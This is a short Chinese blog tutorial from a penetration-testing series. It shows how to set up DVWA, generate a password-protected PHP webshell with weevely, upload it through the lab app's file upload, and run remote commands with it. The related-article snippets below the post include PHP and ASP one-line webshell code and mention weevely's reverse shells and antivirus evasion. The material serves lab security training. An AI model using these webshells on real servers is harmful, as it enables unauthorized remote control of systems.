web安全/渗透测试(五):DVWA和weevely

最新推荐文章于 2022-04-25 21:19:25 发布
最新推荐文章于 2022-04-25 21:19:25 发布
阅读量512 收藏
点赞数
分类专栏: web安全测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_33565921/article/details/105170243
版权

一、DVWA

是一种基于PHP/Mysql的web应用程序,容易受到攻击。

将DVWA security设置为low

账号密码默认为:admin  password

DVMA模块:

二、weevely

(1)用来创建shell.php,其中密码是在步骤3使用

weevely generate [psw] [存放路径]
如:
weevely generate 123456 /root/shell.php

(2)将shell.php上传到目标网站

(3)weevely与目标网站进行交互,命令如下:

weevely [上传文件的url] [psw]
如:
weevely http://10.0.2.4/dvwa/hackable/uploads/shell.php 123456

在weevely输入命令后可在目标电脑执行,且能看到执行结果。

蓝泽兮
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 286
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3176
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
安全测试8_Web安全实战1(DVWA部署)
weixin_30680385的博客
01-18 136
 1、渗透神器的打造(火狐浏览器的打造) Firebug HackBar(渗透插件) Tamper Data(抓包、截包、改包等功能) Proxy Switcher(代理设置)    2、PHP环境安装(phpstudy下载安装即可) 打开官网下载:http://www.phpstudy.net 安装路径非中文  2、DVWA安装   (1)打开官网网址...
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3327
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
kali下的webshell工具-Weevely
weixin_30457465的博客
03-11 661
Weevely ------------------------------------------------ 主要特点: · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接,创建正向、反向的TCP shell连接 o 通过目标...
【使用过程】weevely生成、上传、连接、执行…你一定行
03-31 6743
weevely傻子都会
Weevely的使用与维护
BAIXUAN9527的博客
02-28 1364
软件特点 生成和管理很难检测到的PHP木马,Weevely是一个隐形的PHP网页的外壳,模拟的远程连接。这是一个Web应用程序后开发的重要工具,可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码,Weevely客户端在本地运行shell命令传输。 简介 weevely 属于php 的 webshell 工...
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3104
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
安全渗透测试实践高级系列教程
Kivi的博客
11-27 2060
链接: http://pan.baidu.com/s/1gd89W6R 密码: p59m  解压密码:www.hegouvip.com  部分解压密码:dishiyiqihegoumima 课程目录:   1 BT5简介  1-1本课程内容概述(14分4秒)  2 BT5的安装及基本配置  2-1BT5及VMWare tools的安装(19分41秒)  2-2Linux常
4.文件上传
zlbingo的博客
06-19 158
文件上传 1. DVWA 默认登入帐号密码 admin password DVWA 修改安全等级 在DVWA Security 中选择然后submit 2. 工具 weevely 生成shell.php weevely generate 123456 /home/kali/shell.php在/home/kali/下生成shell.php文件,设置密码为123456 在DVWA中上传shell.php 远程控制 weevely http://192.168.1.104/dvwa/hackab
DVWA安装
wwl012345的博客
08-04 751
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十四个模块,分别是: Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站...
DVWA的搭建和使用
橘子女侠
04-28 5763
1. DVWA (1)DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 (2)DVWA的10个模块 DVWA共有10个模块,分别如下: Brute Force(暴力破解) ...
DVWA-1.9系列操作之FileInclusion
fly小灰灰的专栏
03-17 1915
DVWA-1.9系列一共分为10个功能模块: Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA(不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS(Refl
渗透测试-任意文件上传及客户端绕过案例
lza20001103的博客
04-25 928
任意文件上传及客户端绕过案例
渗透利器Weevely之奇淫技巧篇
qk的专栏
10-26 5165
Weevely简介 Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以在任何安装过python的系统上使用。本文介绍的不是它最基本的功能,而是在渗透测试过程中使用它的奇淫技巧。 安装运行 Linux:(python2.7版本的Debian/Ubuntu) $sudo apt-get install g++
DVWA笔记(5)--File Upload(文件上传)
xiaopan233的博客
02-11 747
file upload 文件上传的话,就是通过网站的上传页面,将后门文件上传上去。看起来似乎很简单,但是上传绕过的方式可谓各式各样,各种绕过姿势。主要的难点就在绕过上传。不过如果成功上传了,那权限维持就很容易了。 low 我们使用kali自带的菜刀weevely生成一个后门文php文件。简单介绍一下kali中的weevely的使用 生成后门文件: weevely generate ...
DVWA环境搭建
weixin_54787877的博客
03-27 583
DVWA介绍 DWVA是一个易受攻击的Web应用程序(DVWA),基于PHP/MySQL的脆弱 Web应用程序。它的主要目标是帮助安全人员在搭建合法环境来测试他们的技能和工具,帮助Web开发人员更好地理解保护Web应用程序的过程,并帮助教师/学生在课堂环境中教/学习Web应用安全性。 官方网站:http://www.dvwa.co.uk/ 下载地址: https://github.com/ethicalhack3r/DVWA/archive/master.zip PHPStudy...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> php一句话木马: <?php @eval($_POS
报错Writable folder /var/www/html/DVWA/hackable/uploads/: No 和Writable folder /var/www/html/DVWA/config: No怎么办?
最新发布
07-25
完成以上步骤后,应该能够解决 "Writable folder /var/www/html/DVWA/hackable/uploads/: No" 和 "Writable folder /var/www/html/DVWA/config: No" 的错误。如果问题仍然存在或有其他疑问,请随时向我提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值